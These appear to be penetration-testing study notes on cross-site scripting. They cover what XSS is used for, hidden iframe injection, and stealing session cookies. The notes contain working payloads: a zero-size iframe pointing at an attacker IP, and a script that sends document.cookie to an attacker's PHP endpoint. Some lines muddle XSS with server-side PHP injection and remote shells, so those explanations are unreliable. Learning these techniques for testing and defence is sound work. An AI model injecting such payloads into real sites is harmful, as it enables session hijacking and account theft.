# 7.1 Cross Site Scripting \(XSS\)

* Uses of XSS attacks
  * cookie stealing
  * authentication bypass
  * redirecting the victim’s browser to a malicious HTML page
  * etc
* XSS vulnerabilities are caused due to unsanitized user input that is then displayed on a web page in HTML format.
* Like injecting a malicious PHP code inside a PHP page. Such that the malicious code runs on the server.
* XSS vulnerabilities go hand in hand with client side attacks.
* Usually remote shell got in such way of exploit have user "www-data".

### 7.1.1 Browser Redirection and IFRAME Injection

* Uses
  * Client side attacks
  * Information gathering script
* Given an environment which is not the user input are not sanitized.
* We first inject malicious code in the webpage as a script. The webpage could be using javascript, PHP, etc. We inject our code in these scripts.
* To steal **cookie or such information of other client** browsing the same website. We inject a reverse connection scripts
  * `<iframe SRC="http://192.168.1.1:80/report" height = "0" width = "0"></iframe>`
  * where 192.168.1.1 is the attacker system IP address for reverse connection.

### 7.1.2 Stealing Cookies and session information

* Instead of a executing a simple remote connection script, we want to first find an authenticated script value, and then exfiltrate this value to the attacker.

```text
<script>
new Image().src="http://192.168.1.1/bogus.php?output="+document.cookie;
</script
```

We inject the above script. This script will first get PHP authenticated cookie and send it to the attacker system. Attacker IP = 192.168.1.1



